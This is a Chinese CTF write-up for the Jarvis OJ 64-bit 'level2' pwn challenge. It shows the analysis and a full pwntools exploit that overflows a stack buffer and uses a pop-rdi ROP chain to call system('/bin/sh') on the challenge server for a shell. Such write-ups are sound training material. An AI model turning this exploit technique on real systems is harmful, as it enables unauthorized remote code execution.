[Jarvis OJ - PWN]——[XMAN]level2(x64)

  • 题目地址:https://www.jarvisoj.com/challenges
  • 题目:

    checksec一下,是64位程序。开启了NX保护
    在IDA看一下,main函数中有我们要的system函数,

    vulnerable_function函数中也有。不过可惜参数都不对,任取一个system地址就好就好。但是我们找到了栈溢出的利用函数read。buf距离rbp的距离为0x80

查找一下看看有没有**"/bin/sh"字符串,发现地址在0x0600A90**

**因为是64位程序,所以函数的前六个参数依次会使用rdi、rsi、rdx、rcx、r8、r9寄存器进行传递。system只有一个参数,使用的寄存器是rdi。**查找一下汇编指令pop rdi的地址,0x04006b3

所以exploit为

from pwn import *
p = remote("pwn2.jarvisoj.com",9882)
binsh = 0x0600A90
pop_rdi=0x04006b3
sys = 0x0400603 #0x040063E 0x04004C0
payload = 'a'*(0x80 + 0x8)
payload += p64(pop_rdi)+ p64(binsh) #将"/bin/sh"pop到rdi寄存器中
payload += p64(sys) #执行system函数
p.recvline()
p.sendline(payload)
p.interactive()

[Jarvis OJ - PWN]——[XMAN]level2(x64)相关推荐

  1. [Jarvis OJ - PWN]——[XMAN]level2

    [Jarvis OJ - PWN]--[XMAN]level2 题目地址:https://www.jarvisoj.com/challenges 题目: 首先,checksec一下.32位并且没有开启 ...

  2. [Jarvis OJ - PWN]——[XMAN]level4

    [Jarvis OJ - PWN]--[XMAN]level4 题目地址: https://www.jarvisoj.com/challenges 题目: checksec一下 IDA中 思路 0x1 ...

  3. [Jarvis OJ - PWN]——[XMAN]level3_x64

    [Jarvis OJ - PWN]--[XMAN]level3_x64 题目地址:https://www.jarvisoj.com/challenges 题目: 老样子,还是先checksec一下,再 ...

  4. [Jarvis OJ - PWN]——[XMAN]level3

    [Jarvis OJ - PWN]--[XMAN]level3 题目地址:https://www.jarvisoj.com/challenges 题目: 先checksec一下,32位程序开启了NX保 ...

  5. [Jarvis OJ - PWN]——[XMAN]level0

    [Jarvis OJ - PWN]--[XMAN]level0 题目地址:https://www.jarvisoj.com/challenges 题目: checksec看看,64位,开启了NX保护 ...

  6. [Jarvis OJ - PWN]——[XMAN]level1

    [Jarvis OJ - PWN]--[XMAN]level1 题目地址:https://www.jarvisoj.com/challenges 题目: 先checksec一下,什么保护都没有开.32 ...

  7. Jarvis OJ PWN题解 持续更新~

    最近沉(被)迷(迫)学pwn    看我们的志琦大佬 我就知道  pwn 玩玩就行    但是 不认真学 不行 然后向大佬打听了几个pwn的平台网站 打算 玩一下   这里找到了 Jarvis OJ ...

  8. [Jarvis OJ - PWN]——Typo(内涵peak小知识)

    [Jarvis OJ - PWN]--Typo 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先check一下, 是arm架构.还是第一次遇到. pe ...

  9. [Jarvis OJ - PWN]——Backdoor

    [Jarvis OJ - PWN]--Backdoor 题目地址: https://www.jarvisoj.com/challenges 题目: 额,怎么说呢这个题有点出乎我的意料, 有点晕乎乎的. ...

最新文章

  1. 在家远程办公,如何才能让员工高效工作?
  2. IDEA多行缩进快捷键
  3. Fabrice Bellard:一个人抵得上一个百人团队
  4. [转] context-param与init-param的区别与作用
  5. [云炬创业基础笔记]第九章企业的法律形态测试4
  6. android通过webservice连接SQL数据库(二)客户端
  7. 06-CoreData增删改查
  8. 课时55.详情和概要标签(理解)
  9. FreeMarker 集合遍历
  10. Typora如何插入公式
  11. 黑马程序员--C语言基础之--sizeof()运算符的使用以及注意
  12. C语言 float、double数据在内存中的存储方式
  13. MariaDB安装、卸载以及相关设置(Linux服务器Mysql部署)
  14. SendMessage 与 PostMessage
  15. js css自动幻灯片切换,非常漂亮的JS+CSS图片幻灯切换特效
  16. ABB电磁流量计ProcessMaster FEP630
  17. javaFX2.0场景(Scene)分析及使用,多场景切换实现
  18. 人在囧途之火车调研篇
  19. 北大本科生凭芯片研究获全球竞赛第一!一作发表8篇EDA领域顶会论文,“致力探索卡脖子难题”
  20. 人像分割之ExtremeC3Net

热门文章

  1. xss_url 通关_11-16
  2. [Python人工智能] 二十八.Keras深度学习中文文本分类万字总结(CNN、TextCNN、LSTM、BiLSTM、BiLSTM+Attention)
  3. HarmonyOS之深入解析设备标识符的功能和使用
  4. 中国大学MOOC 人工智能导论第五章测试
  5. 10.2.3 基本属性
  6. 为什么学Python
  7. 信息学奥赛一本通(C++)在线评测系统——基础(一)C++语言——1067:整数的个数
  8. DSP 的双缓冲串口程序设计
  9. 【STM32】ESP8266模块简介
  10. 【Linux系统编程】Linux 线程浅析